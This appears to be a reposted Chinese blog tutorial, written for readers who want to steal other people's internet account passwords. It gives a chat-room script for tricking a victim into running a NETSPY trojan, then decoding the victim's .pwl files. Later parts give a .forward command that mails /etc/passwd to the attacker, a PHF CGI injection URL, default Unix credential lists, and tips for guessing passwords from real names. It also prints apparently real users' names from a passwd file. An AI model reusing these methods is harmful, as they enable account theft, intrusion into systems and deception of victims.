如何得到别人的上网帐号和密码,我在这里介绍几种弱智方法。
方案一:利用特洛伊***得到帐号。必备工具:NTESPY、PWLVIEW。
优点:只要对方运行了程序就有80%的成功率,而且不需要任何网络***知识,只要能熟悉的操作上面两个软件即可。NETSPY是全中文软件,一看就会。而PWLVIEW又是弱智操作只要在DOS下输入PWLVIEW然后按回车即可。成功率高,操作简单而且用不了多长时间是它最大的优点,只是......
缺点:只有一个,那就是如何让对方乖乖的运行你的程序。
提示:先问清你的目标和你是不是在一个城市。
实战演戏:一天,我在X海聊天室里寻找目标,遇见了同在北京的色鹅丢丢。我上前打招呼:丢丢好呀。丢丢说:你好呀。我又说:XXXXXXX(客套话,先和他拉关系)对了,我拿到了一个新程序,要不要看看?丢丢说:好呀,寄给我吧。
哈哈,鱼上钩了!先把诱饵程序改个名,如改成readme之类的东东,然后和一些不相干的东西发过去,然后你让他先运行README。在这插一句,有一位大侠使用此法时,竟然把控制端程序和NETSPY的说明文件一起发了过去,真搞不懂他怎么想的。我对他说,你先运行README,是中文说明。丢丢说:好...咦,怎么没反映呀?(YEAH!)我又说:那你直接运行软件吧。丢丢说:好吧...不错...我说:明天见...开始干活,连上他的机子后,现在C盘里找到了WIN95的目录WINDOWS。也有可能是WIN95或WIN98,进入后查找*.pwl,然后把所有后缀名为PWL的文件都抓过来,放在你的工具PWLVIEW的子目录里。在DOS窗口下输入PWLVIEW然后敲回车,丢丢的上网帐号和密码就都显示出来了。而且以后如果他上网,NETSPY就会通知你,他就再也逃不出你的手掌心了。就算是他换了密码,你也能在2分钟内再把他搞定。
忠告:你用他的帐号上网后第一件事就是先去查看他的上网时间。分析一下他一般几点上网以避免撞车。
方案二:利用ISP的疏忽做文章举。例用工具:EMAILCRK或网络刺客
优点:没什么优点
缺点:要具体情况具体对待,太麻烦
提示:平时多多留神。
譬如,某个ISP给你开好了帐号,然后又画蛇添足的给你一个邮箱,地址是:你的帐号@xxx.net
密码和你的上网密码一样。也就是说,只要你能敲开邮箱的密码就一切OK了。
运行EMAILCRK或网络刺客,套上字典后就等着。一般没有XX个小时搞不定,不成功的可能性很大,而且破解时还必须要上网。你的机子要是快可以开上三四个窗口,套上不同的字典一起破
方案三:侵入邮局主机然后把PASS档抓回来,然后用JOHN或JACK套上字典开始破。
优点:一次可以破出好多帐号,而且如果运气好还能拿到ROOT,这个主机就要归你控制了。而且破解时不用上网,可以好几台机子一起破。
缺点:对于初学者有一定困难,尤其是只想拿一个上网帐号这样做恐怕会得不偿失。而且被发现的可能性很大,情节严重且性质恶劣,一定要慎重对待。
由于介绍此类的教学文章比较多,我就不班门弄斧了。

哈哈,我来说说最简单的***方法。其实***大体的原理相同,主要是利用系统的漏洞(BUG)来做文章。
只不过有的网站漏洞难找有的好找而已。一个好的***,就是要能很快的发现漏洞并加以利用。下面我给大家举一个小栗子。
有一天,我去XX热线申请主页,发现那里采用的是机器自动回信,信的大概格式如下:

------------------------------

XXX,你好(XX是你在表格上填的名字)
你在XX热线的主页空间已开通
帐户名:XXX 密码:11
-----------XX热线
电话:XXXX-XXXXXXXX
------------------------------

好了,由于是机器回信,所以那里所有人的初始密码都是11,而且该热线要更改密码要TELNET到邮局主机去改,有许多网友并没有接触过如何T主机,所以他们使用的还是初始密码11。
开始干活了,打开FTP软件,输入XX热线的IP,密码11,然后挨个输入帐户名。帐户名可去XX热线的主页空间列表里查看,先试试AAAA,。。。没成功,再换一个,AABB。。。还是不行。哈哈,这个用户名短,没准能行。输入AA。。。进去了。寄下用户名然后继续试,ABC。。。又成功了,看来没改密码的人很多呀。试几个就行了,现在,你已经拥有这些帐户的控制权了。
上面的这个栗子很简单,一般象这么大的漏很难找。要侵入一个稍微象点话的站台就要耗费你大量的时间和金钱,而且还未必能成功。即使成功了,你不改它实在无趣,改了恐怕会步马X的后尘。此人侵入贵阳的主机并把界面换成了一张淫秽图片。害的自己吃饭不用花钱了。所以我在这里劝大家一句,把这方面的精力放到全心全意为人民服务上去。实在不行就去聊天室,看谁不听话就炸他,同样很过瘾的!

                           如何获得第一个帐号

我们这种水平不高的******都是先得到系统的一个有效帐号,进入后再利用系统BUG得到ROOT权限或想办法得到SHADOW再解密.无论是利用系统漏洞还是得到SHADOW都是有一定规律可寻的,通常你到一些***站点找到对应系统相应版本的EXPLOIT编译后执行就行了.我感觉最困难的是获得第一个有效的帐号,有时侯费尽力气也得不到,后来总算是积累了一些经验,想写出来和大家交流一下,希望能抛砖引玉,请高手们把更好的方法告诉我.

确定了目标以后,我通常是先用匿名FTP去看一下,许多网站都开匿名FTP,帐号用ANONYMOUS或是FTP,密码用一个EMAIL帐号(当然是假的),进入后到/etc目录下把PASSWD拿回来,一般情况下都是一份很不全的名单,只有几个系统帐号,那就算白来了:-}但有的时候会有比较傻的管理员把一些普通帐号放进去,这就是很重要的信息,虽然只有帐号没有密码,但毕竟迈出了第一步.如果FTP主目录是drwxr-xr-x,做一个.foward文件传上去,在UNIX下的命令应该是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail [email]me@my.e-mail.addr[/email]" > .forward然后给匿名用户写一封信,它会把PASSWD发给你。

如果目标没有匿名FTP,就通过WWW访问它的主页,看看上面有什么信息,例如通过一些联系人的EMAIL你就可以发现一些帐号,有的网页上甚至列出了EMAIL通讯录,这对***来讲就是无价之宝.把这些帐号记下来,非常有用.

以上几个方法都不行的话,那就试试PHF查询.在浏览器的地址栏输入http://***目标/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的话会显示出PASSWD来,但是成功率极低:-<

还可以利用目标的FINGER功能来积累帐号,如利用HAKTEK(一种扫描器)来监视目标,一旦有人登陆该主机就会报告给你.但这种方法的缺点就是浪费时间,如果你是自己花钱上网的话可就要出血了!

很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系统默认的帐号,例如:

帐号     密码
----------- ----------------
root    root
sys     sys/system/bin
bin     sys/bin
mountfsys  mountfsys
adm     adm
uucp    uucp
nuucp    anon
anon    anon
user    user
games    games
install   install
reboot   给 "command login" 用的
demo    demo
umountfsys umountfsys
sync     sync
admin    admin
guest    guest
daemon   daemon
________________________________________________________________

有些管理员忘记把他们改掉,那你就发财了!

另外还有一些习惯性帐号如:test,www,html,web,oracle,setup,sybase,john,tom等也都应该试一试.

只有帐号还不能进入系统,但有了帐号搞密码就容易一些了,主要办法还是猜.如果是通过PASSWD知道帐号的那你应该会发现该用户的许多信息,例如:

.........

xlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh

qingyuan:x:275:50::/usr/qingyuan:/bin/sh

hjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh

smlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh

kyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh

brlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh

tide:x:301:50:Wang XinYi:/usr/tide:/bin/sh

............

这是一部分PASSWD,从这儿我们可以得到七个帐号,注意每一行的第五项,那是该用户的真实姓名,对!就用它来做密码试.成功率还是比较高的.

如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察[email]support@xxx.xxx.xxx[/email]会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜">如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察[email]support@xxx.xxx.xxx[/email]会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜.

当然最可能的密码还是帐号本身和一些帐号的变形,如帐号是john,密码可能是nhoj,john123,john888等.或是一些简单数字.总之是要费一番工夫来猜的.

如果还猜不出密码,只好用LETMEIN之类的东西来猜,字典一定要好.否则,你的电话费就要.....而且这种方法比较危险,还是不用为好.

最后实在不行还有一种比较卑劣的手段,就是给该网站的网管写封信,想办法骗他执行特洛伊***,然后再.......算了,不说了.

转载于:https://blog.51cto.com/userli/66646

如何得到别人的上网帐号和密码相关推荐

  1. 一不小心搞到了某大学的一堆校园上网帐号。

    原创故事,大学生涯也快要收尾了,写篇文章纪念一下. 也是第一次写博客,好紧张啊,要怎样写才显得低调不傲娇呢? 先声明,这次网络密码窃取不怀恶意,仅供学习实践之用. 这一切要从好久好久以前,不知道什么时 ...

  2. Python 基于python实现ADSL宽带帐号,密码的获取及宽带拨号

    基于python实现ADSL宽带帐号的获取及宽带拨号     基本思想: 1.研究上网方式(实验环境为电信网线接入式ADSL,拨号方式PPPOE) 2.研究宽带帐号和密码生成规律(实验环境,宽带帐号为 ...

  3. [分享]C# 获取Outlook帐号和密码

    [分享]C# 获取Outlook帐号和密码 http://www.vjsdn.com/bbs/bbsTopicDetails.aspx?pid=108281214 转载于:https://www.cn ...

  4. sharepoint 场帐号修改密码

    stsadm -o updatefarmcredentials -userlogin 登录帐号 -password 密码 转载于:https://www.cnblogs.com/flowxp/p/81 ...

  5. 访问局域网计算机切换用户,图解“访问局域网中的电脑时提示输入帐号和密码”...

    我们在访问局域网时,遇到这个问题,那么就是对方电脑设置问题引起的,要想不输入密码就能访问对方的电脑,我们就需要在对方的电脑中设置以下四点: 一.关闭"防火墙". 方法: 1.打开& ...

  6. QQ用户的帐号和密码安全

    近段时间,腾迅公司一直在吹牛他们如何保护QQ用户的帐号和密码安全,Nprotect键盘加密技术多么强大,由于鄙人近期要做一个密码安全保护控件,就仔细分析了QQ2009的密码保护功能框,结果发现QQ20 ...

  7. 如何修改默认的FTP帐号或密码

    如何修改默认的FTP帐号或密码 星期三, 09/15/2010 - 17:21 - wdlinux wdlinux_lamp,wdlinux_lnmp的系统安装好后,默会创建一个FTP用户 用户名是: ...

  8. 登录共享计算机的用户名和密码,如何设置访问共享时每次都需要输入帐号和密码?...

    访问共享时,如何设置每次都需要输入帐号和密码呢,这里小编以WIN7系统做演示,XP系统类似操作. 1.首先在开始菜单中找到"附件"下的"运行",点击打开,如图所 ...

  9. linux获取电信超级密码吗,最简单获取电信光猫超级帐号及密码

    现在很多地方都开始用上了光纤,与以前的ADSL相比速度有了明显的提升,有很多有网络基础的用户喜欢自己研究光猫,但由于电信配的光猫大多只给普通帐号,通常不会给管理帐号,如果要更改光猫的设置则必须需要超级 ...

最新文章

  1. Asp.net设计模式笔记之一:理解设计模式
  2. 使用Unified Auditing Policy审计数据泵导出操作
  3. 左边替换 oracle,sqlsever替换右边第4个字符
  4. struts2中各版本jar包需求及配置设置
  5. C#中await/async闲说
  6. Model 3价格将降至19.9万元?特斯拉要把造谣用户告上法庭
  7. mysql手工注入imformation_mysql 简单手工注入
  8. python求平均值函数_Python两个练习题,写出私信有奖
  9. API接口设计之RESTful软件架构风格
  10. Google是如何设定目标并测量成功的
  11. 华为SecoClient报错[SVN Adapter V1.0感叹号]“接受返回码超时”
  12. python爬淘宝评论源代码_python3爬取淘宝信息代码分析
  13. 惠普打印机双击之后没有扫描_安装hp laserjet m1005 mfp打印机驱动后,双击我的电脑里怎么没有扫描图标呢??...
  14. requests库及相关知识点(get,post区别,params与data区别)
  15. 基于51单片机和555定时器的电阻电感电容测量装置设计
  16. matlab 折射率椭球,折射率椭球详解.ppt
  17. 【二叉树】用python实现AVL树
  18. IB中文:文学作品中幽默手法的表现方式(下)
  19. 济南大雨,银座亲历(转载)
  20. java 成绩_java输出各种学生成绩

热门文章

  1. [转] C#异步操作
  2. 树莓派Linux内核源码配置、编译、挂载(boot/kernal/根文件)、开启新内核
  3. fastreport 直接调网络打印机_为什么UV打印机不能打印凹凸不平的材料?
  4. python处理mysql数据结构_python环境下使用mysql数据及数据结构和二叉树算法(图)...
  5. java 基础面试 英文_[Java面试] 面试java基础总结大全
  6. 刺激战场c语言,刺激战场:假车库、C字楼都是啥?学会吃鸡术语新手变大神!...
  7. BigDecimal类型一定不会失真吗?不一定。参数类型为double的构造方法的结果有一定的不可预知性,是有可能产生失真的。
  8. android自定义渐变色,Android设置背景渐变色
  9. 后端技术:Spring Boot 项目优化和 JVM 调优,真实有效。
  10. 电脑维修的十大原则,你都认同吗?